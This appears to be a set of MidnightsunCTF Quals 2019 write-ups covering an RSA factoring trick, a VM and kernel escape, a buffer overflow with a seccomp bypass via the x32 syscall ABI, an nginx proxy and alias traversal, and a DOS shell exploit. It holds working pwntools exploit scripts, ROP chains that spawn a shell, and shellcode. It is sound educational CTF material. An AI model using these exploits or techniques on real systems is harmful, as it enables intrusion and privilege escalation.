• MidnightsunCTF Quals 2019 - open-gyckel-crypto

    while True:
        p = next_prime(random.randint(0, 10**500))
        if len(str(p)) != 500:
            continue
        q = Integer(int(str(p)[250:] + str(p)[:250]))
        if q.is_prime():
            break
            
    
    >> p * q
    6146024643941503757217715363256725297474582575057128830681803952150464985329239705861504172069973746764596350359462277397739134788481500502387716062571912861345331755396960400668616401300689786263797654804338789112750913548642482662809784602704174564885963722422299918304645125966515910080631257020529794610856299507980828520629245187681653190311198219403188372517508164871722474627810848320169613689716990022730088459821267951447201867517626158744944551445617408339432658443496118067189012595726036261168251749186085493288311314941584653172141498507582033165337666796171940245572657593635107816849481870784366174740265906662098222589242955869775789843661127411493630943226776741646463845546396213149027737171200372484413863565567390083316799725434855960709541328144058411807356607316377373917707720258565704707770352508576366053160404360862976120784192082599228536166245480722359263166146184992593735550019325337524138545418186493193366973466749752806880403086988489013389009843734224502284325825989
    >> pow(m, 65537, p * q)
    3572030904528013180691184031825875018560018830056027446538585108046374607199842488138228426133620939067295245642162497675548656988031367698701161407333098336631469820625758165691216722102954230039803062571915807926805842311530808555825502457067483266045370081698397234434007948071948000301674260889742505705689105049976374758307610890478956315615270346544731420764623411884522772647227485422185741972880247913540403503772495257290866993158120540920089734332219140638231258380844037266185237491107152677366121632644100162619601924591268704611229987050199163281293994502948372872259033482851597923104208041748275169138684724529347356731689014177146308752441720676090362823472528200449780703866597108548404590800249980122989260948630061847682889941399385098680402067366390334436739269305750501804725143228482932118740926602413362231953728010397307348540059759689560081517028515279382023371274623802620886821099991568528927696544505357451279263250695311793770159474896431625763008081110926072287874375257
    

    If we write pp as:

    p=10250x+yp = 10^{250}x+y

    with 0x,y<102500\leq x,y<10^{250}, then qq is obtained by swapping xx and yy:

    q=10250y+xq = 10^{250}y+x

    This means that for n=pqn=pq we have:

    n=pq=(10250x+y)(10250y+x)=n = pq = (10^{250}x+y)(10^{250}y+x) = =10500xy+10250x2+10250y2+xy=(10500+1)xy+10250(x2+y2)=10^{500}xy + 10^{250}x^2 + 10^{250}y^2 + xy = (10^{500}+1)xy+10^{250}(x^2+y^2)

    But now n0xy+10250(x2+y2)mod10500+1n \equiv 0xy + 10^{250}(x^2+y^2) \mod 10^{500}+1 or x2+y2n10250mod10500+1.x^2+y^2 \equiv \frac{n}{10^{250}} \mod 10^{500}+1\,. As 1025010^{250} and 10500+110^{500}+1 are coprime, this is well-defined.

    In sage:

    sage: R=Zmod(10^500+1)
    sage: s = Integer(R(n)*R(10^250)^-1)
    

    But on the other hand, as xx and yy are less than 1025010^{250}, the sum of their squares must be less than (10250)2+(10250)2=210500(10^{250})^2+(10^{250})^2=2\cdot 10^{500}. As we already know the residue of x2+y2x^2+y^2 mod 10500+110^{500}+1, this means that we only have two possibilities left: ss and s+10500+1s+10^{500}+1. It is possible to quite easily exclude the first one: ss is divisible by 33 but not 99, which would be in contradiction to the Sum of two squares theorem. Of course, one can also just try both values.

    This means that x2+y2x^2+y^2 must be s+10500+1s+10^{500}+1. Using n=(10500+1)xy+10250(x2+y2)n=(10^{500}+1)xy+10^{250}(x^2+y^2) we now have two equations for two variables. Those can be solved by substituting and solving the resulting biquadratic equation, or just using sage:

    sage: x,y=var("x,y")
    sage: solve([n==(10^500+1)*x*y+10^250*(x^2+y^2),x^2+y^2==s+10^500+1],(x,y))
    [[x == 6704087713997099865507815769768764401477034704508108261256143985284139367993820913412851771729239540206881848078387952673084087851136091482870695733338884807660355569782830813482768223955545908153884900037741101021721778447622913463893844919116113159, y == 9167577910876006891858257597237629440949705918335724259091862313200766026122707397405770653228405765712936180484223756343702067850288957263434298651591281476391443835610092615155677011406076889438184185284410734629391841138106293296764467469014716371], ...]
    

    (symmetric and negative solutions omitted). Now it’s just a matter of recovering pp and qq and deciphering:

    sage: p=10^250*x+y
    sage: q=10^250*y+x
    sage: p*q==n
    True
    sage: d=ZZ.quo((p-1)*(q-1))(65537)**-1
    sage: m=int(pow(c,d,n))
    sage: binascii.a2b_hex(hex(m)[2:-1])
    'midnight{w3ll_wh47_d0_y0u_kn0w_7h15_15_4c7u4lly_7h3_w0rld5_l0n6357_fl46_4nd_y0u_f0und_17_50_y0u_5h0uld_b3_pr0ud_0f_y0ur53lf_50_uhmm_60_pr1n7_7h15_0n_4_75h1r7_0r_50m37h1n6_4nd_4m4z3_7h3_p30pl3_4r0und_y0u}\x99\xd3\x84\x00\xdd\x98\xbf\xedv\xe8|\xd3#\x01sR\x83\x9f\xce\x9fHg\xef\xfb\x07\x05\xc7\xd1R4*\xbc\x9e`\x9aW\x10\x0b5\xc0\xc0\xf9\xcc2dD\x00\xd5\x89\xfd2\xd2l\xe3N3\x8bU6}[\x92\xd5\xf5\x0fO\xde-\xf1\xb0\xbe\xaf\xc5\xcfM\xadyo\xd9\xbf\xff\xeci\xd5$\xf99\xde\xad\xaaP{\xfc\xf7\x91 o2\x99M\x9cE\xfe@,\xc0\x8d\x88wU\xb0\x82X\xa2;r\xeaq\x8eV\x05t\x94\xb8\x8c\xba\x90\xf5\xa8\xf9\x17$\x94\xf4:\x11\x9e\xfc\x0b]\x97\xbbMv9\x865f*$\x93r\xf65j\xc0jk\xf0\xab\xd5\t\xb3\xda\x17\xb0~\x05}\xc4@(\xa8\r\x16\x01V\xcdm\x901\x17\x18\xf3\xfd\xd6L\xa7\x13|\xaa\x9d\x1e_\xb4%g/Q+\xff\xc1\xbe\xf1fB#g\xa8\xda\xdd4'
    
  • MidnightsunCTF Quals 2019 - hfs-vm (287 pts, 42 solves) and hfs-vm2 (660 pts, 14 solves)

    hfs-vm:

    Write a program in my crappy VM language.

    Service: nc hfs-vm-01.play.midnightsunctf.se 4096

    Download: hfs-vm.tar.gz

    hfs-vm2:

    Escape the VM to get a flag.

    Service: nc hfs-vm-01.play.midnightsunctf.se 4096

    Download: hfs-vm.tar.gz

    Analysis

    The provided service implements a VM for a custom architecture as well as a ‘kernel’ which the VM process uses to interact with the system.

    userspace and kernel

    The userspace and the kernel are implemented using two processes; the binary forks on startup and the parent becomes the kernel while the child executes the userspace. They communicate via both a socket pair and a shared memory region.

    The kernel process initially resets its stack canary, to get a canary different from that in the userspace process.

    The userspace process reads bytecode from the user and implements a simple VM to ‘execute’ the bytecode. Additionally, it enables the strict seccomp mode, which only allows the read, write and exit system calls.

    ‘system calls’ between the userspace process and the kernel process are implemented using the socket pair and shared memory mentioned above. To enter a system call, the userspace process sends the system call number and arguments over the socket, and reads the return value from the socket. The kernel process on the other hand reads from the socket, then executes the system call, and writes the return value back to the socket. This way, one of the two processes is always blocked reading. Large arguments or return values are passed via the shared memory region: the first two bytes of the region contain the size of the data, followed by the raw data.

    Custom VM

    As already mentioned above, the userspace process implements a simple VM for a custom architecture. The virtual 16-bit CPU has 16 registers, numbered 0 through 15, with register 14 and 15 doubling as the stack and instruction pointer. The stack has a fixed size of 32 words. Internally, the state of the VM is stored in the following struct on the stack of the userspace process:

    struct state_t {
      int fd;
      int pad;
      void *shared_mem;
      uint16_t regs[14];
      uint16_t reg_sp;
      uint16_t reg_pc;
      uint16_t stack[32];
    };
    

    The custom architecture executes bytecode with 4 byte long instructions encoding the instruction type and up to two operands. The following instructions are supported:

    • mov reg, imm, add reg, imm, sub reg, imm, xor reg, imm: move/add/subtract/xor the register reg with the 16-bit immediate value imm and store the result in reg

    • mov reg, reg, add reg, reg, sub reg, reg, xor reg, reg: move/add/subtract/xor the first register with the second register and store the result in the second register

    • xchg reg, reg: swap the contents of the two registers

    • push reg, push imm: push the register / immediate value onto the stack

    • pop reg: pop a value off the stack and store it in reg

    • setstack reg, imm, setstack reg, reg: use the value of the register reg as an (absolute) index into the stack; set the stack value at that index to reg/imm

    • getstack reg, reg: use the value of the first register as an (absolute) index into the stack; store the stack value at that index in the second register

    • syscall: trigger a system call; the first three registers are passed to the kernel as the syscall number and two arguments

    • debug: output the values of all registers and the stack

    The syscall instruction additionally passes the VM’s stack to the kernel via the shared memory region. When looking at the implementation of these instructions, we notice that push and pop perform bounds checks on the stack, while setstack and getstack don’t!

    The First Flag

    At this point we can already obtain the first flag by issuing syscall 3, which copies the flag onto the VM’s stack, and then executing the debug instruction.

    Flag: midnight{m3_h4bl0_vm}

    Exploitation

    Because of the strict seccomp mode used by the userspace process, we cannot spawn a shell from that process. We have to use the bug discovered above to gain control of the userspace process, afterwards use another bug in the kernel to escalate further and then spawn a shell.

    ROP in the userspace

    Using the missing bounds checks mentioned above, we can first leak both the stack canary (of the userspace process) and the base address of the binary (which will be the same in the userspace and kernel processes). After that, we overwrite the stack of the userspace process and execute a ROP chain. Because our previously sent bytecode has to write this chain, we are limited in size. Thus, the first ROP chain will just read some input (the second ROP chain) onto the data segment of the process and pivot the stack there.

    # gadgets encoded as tuples
    # the first element is the gadget/address
    # the second element indicates if the address is relative to the binary's base
    
    # read(0, data + 0xa00, 0xe00)
    (pop_rdi, True),
    (0, False),
    (pop_rsi, True),
    (0x203000 + 0xa00, True),
    (pop_rdx, True),
    (0xe00, False),
    (binary.plt.read, True),
    # rsp = data + 0xa00
    (pop_rsp, True),
    (0x203000 + 0xa00, True),
    

    We have to write this first ROP chain using the bytecode executed in the VM, using the getstack and setstack instructions as explained above. Because we have no way to leak the base address of the binary before sending the bytecode, we have to use the bytecode to adjust the addresses of our gadgets.

    # generate the bytecode for a given ROP chain
    # abbreviations for opcode operands: r = register, s = stack, i = immediate
    
    bc = ''
    # set regs 1, 2, 3, 4 to ret addr (4 is not touched, because always zero)
    bc += mov_rs(1, 52)
    bc += mov_rs(2, 53)
    bc += mov_rs(3, 54)
    # adjust regs to base addr (subtract offset of return address)
    bc += sub_ri(1, 0xe6e)
    # debug to leak base addr
    bc += p32(0xa)
    
    idx = 52
    for val, rel in rop:
        if rel:
            # set regs 5, 6, 7, 8 to val
            bc += mov_ri(5, val & 0xffff)
            bc += mov_ri(6, (val >> 16) & 0xffff)
            bc += mov_ri(7, (val >> 32) & 0xffff)
            bc += mov_ri(8, (val >> 48) & 0xffff)
            # add base addr
            bc += add_rr(5, 1)
            bc += add_rr(6, 2)
            bc += add_rr(7, 3)
            # write to stack
            bc += mov_sr(idx, 5)
            bc += mov_sr(idx + 1, 6)
            bc += mov_sr(idx + 2, 7)
            bc += mov_sr(idx + 3, 8)
        else:
            # write to stack
            bc += mov_si(idx, val & 0xffff)
            bc += mov_si(idx + 1, (val >> 16) & 0xffff)
            bc += mov_si(idx + 2, (val >> 32) & 0xffff)
            bc += mov_si(idx + 3, (val >> 48) & 0xffff)
        idx += 4
    

    For exploiting the kernel, we will need access to the shared memory region, so we use the second ROP chain to leak its address and read a third ROP chain.

    # second rop chain to leak shared_mem pointer
    rop = ROP(binary)
    rop.write(1, binary.address + off_shared_mem, 8)
    rop.read(0, binary.address + off_second_chain, 0x500)
    rop.raw(binary.address + pop_rsp)
    rop.raw(binary.address + off_second_chain)
    

    ROP in the kernel

    Now that we have all info we need and the ability to execute an arbitrarily long ROP chain, we can search for a bug in the kernel.

    The first bug is obvious when looking at the syscall handler: the shared memory region (which also contains its own size and is fully controlled by userspace) is copied in a fixed-size buffer on the stack, leading to a simple stack buffer overflow. However, there is a stack canary preventing us from exploiting this bug alone.

    The second bug is a synchronization issue: right before the kernel returns from a syscall, the stack buffer is copied back into the shared memory region, using the size specified in the shared memory region. That means, if we manage to increase the size while the kernel performs a syscall, we can leak data from the kernel stack! During normal operation one of the two processes always blocks while reading from the socket, but now that we control the userspace, we can trigger a syscall and continue execution in userspace without waiting for the syscall to finish.

    At first this sounds like a hard race condition we have to win, until we look at syscall number 4 which, when supplied with a specific argument, sleeps for a total of 4 seconds. That’s more than enough time to increase the size of the shared memory region. The last issue we have is that, to get the correct timing, the userspace process needs to wait too, but sleep (actually nanosleep) is blocked by the seccomp filter. We can still let the userspace process wait by issuing a dummy read from stdin and waiting the correct amount in our exploit script.

    So here’s the plan for the third ROP chain: we trigger syscall number 4 and wait a second for the kernel to enter the syscall. Then we overwrite the size of the shared memory region and wait for the kernel to return from the syscall. Now the kernel’s stack canary is stored in the shared memory region, so we print the kernel’s canary to stdout. Our exploit script uses that canary and the info we acquired previously to craft a ROP chain for the kernel. The ROP chain in the userspace continues and reads the ROP chain for the kernel from stdin, into the shared memory region. Finally, it triggers any syscall. The kernel now copies the shared memory region onto its stack, smashing it in the process.

    # third rop chain to trigger ROP in kernel
    rop = ROP(binary)
    rop_data = ''
    rop_data_addr = binary.address + off_second_chain + 0x200
    
    def data_sys(num, arg1=0, arg2=0):
        return p8(num) + p16(arg1) + p16(arg2)
    
    # trigger sys_random(4)
    rop.write(parent_fd, rop_data_addr, 5)
    rop_data += data_sys(4, 4)
    # overwrite shared_mem size
    rop.read(0, shared_mem, 2)
    # dummy read, just for waiting a bit
    rop.read(0, shared_mem, 2)
    # leak parent stack canary
    rop.write(1, shared_mem + 74, 8)
    # read rop chain for parent to shared_mem
    rop.read(0, shared_mem, 0x1000)
    # trigger rop in parent, via sys_ls()
    rop.write(parent_fd, rop_data_addr + len(rop_data), 5)
    rop_data += data_sys(6)
    # exit
    rop.exit(0)
    

    The ROP chain executed in the kernel is very simple: since the binary imports system, we can return to it, passing sh as argument (which we can also place in the shared memory), and finally get a shell!

    rop = ROP(binary)
    # 'sh' is placed at shared_mem + 0x300
    rop.system(shared_mem + 0x300)
    

    Flag: midnight{7h3re5_n0_I_iN_VM_bu7_iF_th3r3_w@s_1t_w0uld_b3_VIM}

    You can find the full exploit script here.

  • MidnightsunCTF Quals 2019 - gissa2 (631 pts, 15 solves)

    Last year some dirty hackers found a way around my guessing challenge, well I patched the issue. Can you guess again?

    Service: nc gissa-igen-01.play.midnightsunctf.se 4096

    Download: gissa_igen.tar.gz

    Analysis

    The provided binary first mmaps the flag and then lets us try to guess it. After mapping the flag, the binary also installs a seccomp filter which forbids the system calls open, clone, fork, vfork, execve, creat, openat and execveat.

    The length of the buffer our input is read to is stored in the main() function as a uint16_t, but a pointer to this length is passed to the guess_flag() function as a uint32_t *. Right after the buffer length the current number of tries is stored, so when guess_flag() accesses the buffer length, it actually uses both of these values. This has the effect that on our first guess, the buffer length has the correct value of 0x8b, but on the second guess, the buffer length has increased to 0x1008b, which leads to a stack buffer overflow.

    Exploit: ROP

    No canary is used, so we can easily overwrite the return address. The only problem left before we can execute a ROP chain is that we don’t know the binary’s base address (it’s a PIE). But that’s easily solved: because the binary doesn’t terminate our input string, we can leak the original return address before sending our ROP chain. However, when we gain control of the execution flow, the flag has already been unmapped and its file descriptor closed. There’s no way for us to divert the execution flow before that point, so we have to find a way to bypass the seccomp filter.

    ROP to Shellcode

    To ease bypassing of the seccomp filter, let’s first set up a ROP chain to get shellcode execution. The ROP chain is pretty straightforward: map some RWX memory at a fixed address, read our next input into it, and jump there.

    sc_addr = 0x1337000
    rop = rop_call(binary + off_mmap, sc_addr, 0x10000, 7, 0x32, -1, 0)
    rop += rop_call(binary + off_read, 0, sc_addr, 0x10000)
    rop += p64(sc_addr)
    

    Bypass seccomp Filter

    Now that we can execute shellcode, the only thing left is somehow bypassing the seccomp filter in order to read the flag. Here’s the filter used:

     line  CODE  JT   JF      K
    =================================
     0000: 0x20 0x00 0x00 0x00000004  A = arch
     0001: 0x15 0x01 0x00 0xc000003e  if (A == ARCH_X86_64) goto 0003
     0002: 0x06 0x00 0x00 0x00000000  return KILL
     0003: 0x20 0x00 0x00 0x00000000  A = sys_number
     0004: 0x15 0x00 0x01 0x00000002  if (A != open) goto 0006
     0005: 0x06 0x00 0x00 0x00000000  return KILL
     0006: 0x15 0x00 0x01 0x00000038  if (A != clone) goto 0008
     0007: 0x06 0x00 0x00 0x00000000  return KILL
     0008: 0x15 0x00 0x01 0x00000039  if (A != fork) goto 0010
     0009: 0x06 0x00 0x00 0x00000000  return KILL
     0010: 0x15 0x00 0x01 0x0000003a  if (A != vfork) goto 0012
     0011: 0x06 0x00 0x00 0x00000000  return KILL
     0012: 0x15 0x00 0x01 0x0000003b  if (A != execve) goto 0014
     0013: 0x06 0x00 0x00 0x00000000  return KILL
     0014: 0x15 0x00 0x01 0x00000055  if (A != creat) goto 0016
     0015: 0x06 0x00 0x00 0x00000000  return KILL
     0016: 0x15 0x00 0x01 0x00000101  if (A != openat) goto 0018
     0017: 0x06 0x00 0x00 0x00000000  return KILL
     0018: 0x15 0x00 0x01 0x00000142  if (A != execveat) goto 0020
     0019: 0x06 0x00 0x00 0x00000000  return KILL
     0020: 0x06 0x00 0x00 0x7fff0000  return ALLOW
    

    The filter checks the current architecture, so we cannot bypass it by switching to 32-bit mode However, if we set bit 30 of the syscall number, we can access the ‘x32’ syscall ABI, which provides basically the same system calls and is not blocked by the seccomp filter. Thus, using syscall 0x40000002 instead of 2 for open lets us open and print the flag.

    # open(0x1338000, 0, 0) - 0x1338000 contains the path
    mov rax, 0x40000002
    mov rdi, 0x1338000
    mov rsi, 0
    mov rdx, 0
    syscall
    
    # read(flag, 0x1338000, 0x100)
    mov rdi, rax
    mov rax, 0
    mov rsi, 0x1338000
    mov rdx, 0x100
    syscall
    
    # write(1, 0x1338000, 0x100)
    mov rax, 1
    mov rdi, 1
    mov rsi, 0x1338000
    mov rdx, 0x100
    syscall
    

    Flag: midnight{I_kN3w_1_5H0ulD_h4v3_jUst_uS3d_l1B5eCC0mP}

    Exploit Code

    from pwn import *
    
    context.binary = 'gissa_igen'
    
    shellcode = asm('''
        mov rax, 0x40000002
        mov rdi, 0x1338000
        mov rsi, 0
        mov rdx, 0
        syscall
    
        mov rdi, rax
        mov rax, 0
        mov rsi, 0x1338000
        mov rdx, 0x100
        syscall
    
        mov rax, 1
        mov rdi, 1
        mov rsi, 0x1338000
        mov rdx, 0x100
        syscall
    ''')
    
    g = remote('gissa-igen-01.play.midnightsunctf.se', 4096)
    
    # increase buf_len
    g.sendlineafter('flag (', '')
    g.recvuntil('try again')
    
    # overwrite buf_len with 168
    g.sendlineafter('flag (', 'A' * 140 + p32(168) + p64(0) * 2)
    
    # leak binary addr
    g.sendafter('flag (', 'A' * 140 + '\xff\xff' + '\x01\x01' + 'B' * 8 + '\xff' * 8 + 'C' * 8)
    g.recvuntil('C' * 8)
    binary = u64(g.recvuntil(' is not right', drop=True).ljust(8, '\0')) - 0xbc5
    info("binary @ 0x%x", binary)
    
    # ROP to shellcode
    
    def rop_call(func, rdi=0, rsi=0, rdx=0, rcx=0, r8=0, r9=0):
        return flat(binary + 0xc1f, rcx, 0, 0, 0, binary + 0xc1d, rdx, r9, r8, rdi, rsi, func)
    
    sc_addr = 0x1337000
    # mmap
    rop = rop_call(binary + 0xc0c, sc_addr, 0x10000, 7, 0x32, -1, 0)
    # read
    rop += rop_call(binary + 0xbd4, 0, sc_addr, 0x10000)
    rop += p64(sc_addr)
    g.sendlineafter('flag (', 'A' * 168 + rop)
    
    g.sendafter('not right.\n', shellcode.ljust(0x1000, '\0') + '/home/ctf/flag\0')
    
    g.interactive()
    
  • MidnightsunCTF Quals 2019 - bigspin

    bigspin was a challenge for the MidnightsunCTF Quals 2019

    On visiting the linked website you get a message, asking if you are a user, admin or uberadmin, or just a usual pleb (all links to identically named subdirectories).

    We are all usual plebs

    Visiting anything but pleb fails. Visting pleb results in the content of example.com showing on your screen.

    With a bit of trial and error it becomes obvious that it’s a reverse proxy for example.com with a missing / after the domain name, making it possible to visit something like /pleb.localhost.localdomain/user.

    nginx.cönf

    Accessing the directory gives us a directory listing with a single file called nginx.cönf (including a space at the end of the filename).

    Just clicking on the file results in a 404, we have to double encode the filename because nginx decodes it first before it’s used in the reverse proxy url. Something like /pleb.localhost.localdomain/user/nginx.c%25C3%25B6nf%2520 works and gives us a copy of the used nginx config:

    worker_processes 1;
    user nobody nobody;
    error_log /dev/stdout;
    pid /tmp/nginx.pid;
    events {
      worker_connections 1024;
    }
    
    http {
    
        # Set an array of temp and cache files options that otherwise defaults to
        # restricted locations accessible only to root.
    
        client_body_temp_path /tmp/client_body;
        fastcgi_temp_path /tmp/fastcgi_temp;
        proxy_temp_path /tmp/proxy_temp;
        scgi_temp_path /tmp/scgi_temp;
        uwsgi_temp_path /tmp/uwsgi_temp;
        resolver 8.8.8.8 ipv6=off;
    
        server {
            listen 80;
    
            location / {
                root /var/www/html/public;
                try_files $uri $uri/index.html $uri/ =404;
            }
    
            location /user {
                allow 127.0.0.1;
                deny all;
                autoindex on;
                root /var/www/html/;
            }
    
            location /admin {
                internal;
                autoindex on;
                alias /var/www/html/admin/;
            }
    
            location /uberadmin {
                allow 0.13.3.7;
                deny all;
                autoindex on;
                alias /var/www/html/uberadmin/;
            }
    
            location ~ /pleb([/a-zA-Z0-9.:%]+) {
                proxy_pass   http://example.com$1;
            }
    
            access_log /dev/stdout;
            error_log /dev/stdout;
        }
    
    }
    

    I’m an admin!

    We can see that /admin is an internal block, which can’t be accessed directly but since we have control over the reverse proxy URL we can use it to point to a server of our control and add a header like X-Accel-Redirect: /admin/, which instructs nginx to do an internal redirect and delivers us the content as if we’d have been able to access /admin/ directly.

    In the admin directory is a flag.txt, but it only tells us that the flag is only for uberadmins.

    I lied, I’m really an uberadmin.

    Since the location blocks are not terminated with a slash but the alias in the /admin block is terminated we can inject dots to access a higher directory.

    Setting the header on our server to X-Accel-Redirect: /admin../uberadmin/flag.txt results in the flag.

    Lesson learned: Terminate all paths and URLs with slashes.

  • MidnightsunCTF Quals 2019 - hfs

    Stage1: Getting Past The Password Auth (hfs-mbr)

    I used IDA in remote debug mode during the CTF, but it was somehow buggy and an overall painful experience for me. Writeup using radare2 (even though, what a surprise, their 16 bit remote debugger seems to be currently kind of broken as well).

    r2 -b16 dos.img
    

    At offset 0000:0637 we find the main password loop of the program.

    m1

    A single character is read, then a check is performed if the character is in the range of [a-z]. If it is, the char is converted into numbers ranging from 0 to 25. Afterwards the number is multiplied by 2 and serves as the index of a jumptable. E.g. depending on the index a different function is called (jmp ax).

    We can find the called functions below, starting at 0000:0662. Luckily they were in oder, e.g. the first jumptable function belongs to the character ‘a’, the second to ‘b’, etc.

    m11

    Most of the functions are dummy ones, effectively doing nothing. But some of them contain some checks, and depending on the outcome a different path is choosen. The 0x7d9 path is the one we don’t want to take. 0x7ce Is the way to go because it increments a counter for the amount of ‘correct chars’ (0x81bb), while the other one just increments the ‘total chars’ (0x81ba). If after 9 input bytes both counters are equal, the password is correct.

    So the objective is clear, we have to find the correct order of all jumptable functions.

    Effectively all jumptable functions are doing the same, however they are more or less “obfuscated”.

    1. They take the number of ‘total chars’ and xor it with the current input character (xor dl, byte [0x81ba]).
    2. They compare the resulting value with a fixed one, and take the good branch if correct

    So I just deobfuscated all functions and noted the value they compare the input with. E.g. the function for char ‘e’ can be seen at 0000:0686.

    1. The first ax assignment is useless because of the follow up xor ax, ax (ax = 0)
    2. 6 times adding 0x10 to ax is equal to ax = 0x60
    3. Therefore 0x60 is subtracted from our xored charcode, and if the result is 2 we are good. This equation is fulfilled for xored charcode == 0x62.

    I now did this for all functions and wrote a python script to resolve the correct order.

    chars = {'e': 0x62, 'j': 0x68, 'n': 0x68, 'o': 0x6e, 'p': 0x74, 'r': 0x7a, 's': 0x73, 'u': 0x76, 'w': 0x72}
    pw = ''
    n = 0
    for _ in range(len(chars)):
        for c in chars:
            if (ord(c) ^ n) == chars[c]:
                pw += c
                n += 1
    print(pw)
    

    we get sojupwner, wich leads us to the first flag midnight{w0ah_Sh!t_jU5t_g0t_REALmode} and gives us access to stage2. We are now dropped into a custom written “shell” (COMMAND.COM).

    Stage2: Pwning The Shell (hfs-dos)

    First of all, I extracted the COMMAND.COM binary out of the raw image.

    fdisk -l dos.img
    
    Disk dos.img: 10 MiB, 10485760 bytes, 20480 sectors
    Units: sectors of 1 * 512 = 512 bytes
    Sector size (logical/physical): 512 bytes / 512 bytes
    I/O size (minimum/optimal): 512 bytes / 512 bytes
    Disklabel type: dos
    Disk identifier: 0x00000000
    
    Device     Boot Start   End Sectors  Size Id Type
    dos.img1   *       63 20159   20097  9.8M  1 FAT12
    

    We can see that the FAT12 Filesystem starts at offset 63, and the sector size is 512. Therefore we setup the loop device for an offset of 63*512.

    losetup /dev/loop0 dos.img -o 32256
    

    Now we can mount and comfortably read the filesystem.

    mount /dev/loop0 /mnt
    

    Extract the COMMAND.COM and throw it into IDA or radare2.

    The bug was pretty easy to spot as well, even found it bevore even looking at the disassembly. Deleting a character by using backspace had no lower bounds check. With this we could owerwrite jumptable entries for console commands as they were placed directly above the input buffer. By entering an overwritten command we now could now jump arbitrary.

    m2

    An other thing I used to exploit is, that the shell reads and prints the flag for stage1 in the beginning. And the Filename of Flag1 was right above us as well. Therefore my attack was as follows:

    1. Overwrite the filename of the first flag (FLAG1) so it becomes FLAG2
    2. Overwrite a jumptable entry of some console command with the address of the “print flag” function.
    3. Trigger by executing the overwritten command (“pong” in my case)
    from pwn import *
    
    # setup and stage1
    r = remote('hfs-os-01.play.midnightsunctf.se', 31337)
    r.recvuntil('MBR]>')
    r.sendline('sojupwner')
    r.send('ping')
    r.recvuntil('PONG')
    
    # actual exploit
    r.send('\x7f' * 3 + '2\x0d')
    r.send('\x7f' * 11 + struct.pack('<H', 0x14f) + '\x0d')
    r.send('pong')
    r.interactive()
    

    we get midnight{th4t_was_n0t_4_buG_1t_is_a_fEatuR3}.